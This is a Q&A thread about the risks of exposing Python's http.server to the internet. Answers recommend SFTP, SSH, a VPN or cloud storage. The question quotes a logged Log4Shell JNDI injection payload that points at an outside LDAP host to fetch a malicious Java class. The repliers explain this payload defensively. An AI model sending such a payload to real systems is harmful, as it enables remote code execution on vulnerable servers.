# Is it OK to host a Python's http.server accessible from the Internet?

Tags: python, http

I'm running  `python3 -m http.server 8080` together with port forwarding to have access to files from my laptop from anywhere.

But there appeared random connections and a particular weird line:

```
GET /${jndi:ldap://185.246.87.50:1389/Exploit}
```

You can see more in this:

[image]

Is it safe what I'm doing? And if not, then is there any way that I can make it safe? Maybe something like a login password?

Comment: “I'm running  `python3 -m http.server 8080` together with port forwarding to have access to files from my laptop from anywhere.” What you are effectively doing is allowing anyone who can reach your laptop to have access to your system. Even if you are adding credentials to the application you are running on port 8080, that does not mean your system is safe. Those `GET /${jndi:ldap://185.246.87.50:1389/Exploit}` are _attempts_ to exploit the Apache Log4j2 vulnerability that was recently revealed. But even if that is not exploited the fact your port 8080 app is wide open means it is not safe.

Comment: Do you know any methods to do this things in a safe manner?

Comment: As [dirkt states](https://superuser.com/a/1695234/167207), “…and if you need it to be safe, I recommend to take the server offline right now.” If you want to access files on your PC remotely, you need to set it up as being able to SSH or SFTP into. Or even using a VNC server and client on the other side. The truth? I personally believe if all you want to do is access files remotely you just need to use Dropbox, Google Drive or iCloud. Whatever fits your system best. But exposing a Python script to the world on a standard 8080 port is asking for trouble. Turn it off now and use the other stuff.

Comment: *"Is it OK to host a Python's http.server accessible from the Internet?"* -- If you insist on doing this, it would arguably be much better to use e.g. an actual web server, such as Apache. `http.server` is essentially intended for testing and doesn't have any safety features. At the very least, you can do basic password authentication with Apache.

Answer (score 5, accepted):

Depends on what files you are hosting and what authentication,authorization or general defense mechanism you are using currently (Probably none as I understand). If the files are sensitive just serving them using a simple HTTP server without any authentication/protection probably not the best idea.

About that `jndi` log you see:

- The request you see as `GET /${jndi:ldap://185.246.87.50:1389/Exploit}` is an exploit request to download malicious Java class as far as I know.
- This is a fairly new exploit method seen in the wild. Mostly targeting logging mechanism of applications.
- It's caused by an Java library (log4j) is exploited for RCE (Remote Code Execution) or for patched version DOS (Denial of Service).
- Since Python Simple HTTP Server is running solely on Python code (as far as I know, again.) you got nothing to worry about. (Unless you are also logging HTTP requests using different applications or methods.)
- CVE-2021-45046 and CVE-2021-45105 if you want more info about it, just Google it.

*My humble advice:*

1. Since you are currently doing port forwarding on your network, you can simply use an SFTP (Secure FTP) service for your file needs. Or can just SCP.
2. Using a DMZ would serve you well to. [What is a DMZ?](https://www.youtube.com/watch?v=dqlzQXo1wqo)
3. If you serve anything on the internet (Doesn't matter the service or port you are using), you will be detected and scanned. No worries if you are prepared for such thing (Updates, knowing what is exposed, what version is it, etc.).
4. Mass scans always happen. (Mostly when a new exploit is publicly disclosed.) You can prevent this situation using different methods. WAF's (Web Application Firewall) and such. Please be aware WAF's can be bypassed on most situations.

*What I would do?*

- I'm not a fan of running HTTP servers 7/24 for personal needs. I would simply use a SFTP server or cloud if it fits your needs. [Very brief info for you about FTP & SFTP.](https://www.youtube.com/watch?v=tOj8MSEIbfA)

Answer (score 6):

> I'm running  python3 -m http.server 8080 together with port forwarding to have access to files from my laptop from anywhere.

Which probably means everyone else also has access to those files... so I hope there's nothing in them you don't want other people to read.

> But there appeared random connections and a particular weird line: GET /${jndi:ldap://185.246.87.50:1389/Exploit}.

The weird line means people are scanning for the log4j vulnerability (google), but as you have a Python server and not Java, that one shouldn't worry you. (The other random connections should, however).

> If not, then is there any way that I can make it safe? Maybe something like a login password?

If you do not know how to make it safe (and following random recipes you find on the internet will never make it safe if you don't know what you are doing), and if you need it to be safe, I recommend to take the server offline right now. Instead, start using something else (e.g. a VPN, or `ssh`).

Comment: Do you know any resources where I could learn to have my files secured by a login or where I could learn how to use VPN or ssh?

Comment: @sandrino Part of the problem with anyone helping you here is you state you are running a service on port 8080 but then you state, “…to have access to files from my laptop from anywhere.” What do you need access to that somehow requires you creating a Python service on port 8080? If you need access to files, Dropbox, Google Drive and iCloud can work. If you need remote access to code? Places like GitHub can work. But if you just want full system access to your laptop, that is a horrible idea. Much better to use existing tools like SSH, SFTP or services I mentioned. Don’t reinvent the wheel.

Answer (score 3):

> I'm running `python3 -m http.server 8080` together with port forwarding to have access to files from my laptop from anywhere.

This can roughly be translated to:

> I'm ripping a giant hole in my laptop's virtual security walls.

It's a horrible idea to run a server with absolutely no protection on a well-known / often used port in the public.
If you absolutely need to make your files accessible like that then you should run it on a random port that's not as commonly used as 8080. But (as the others already said) it's better to use a secure file share service like Dropbox, Google Drive, ... or if you want to host it yourself use something like SFTP or a self-host file share service like NextCloud, OpenNAS or TrueNAS. I'm not really into that NAS kind of stuff so you should do a bit of research on that yourself.

Comment: I would vote for a NAS box as well, Synology is easy to setup and has a nice interface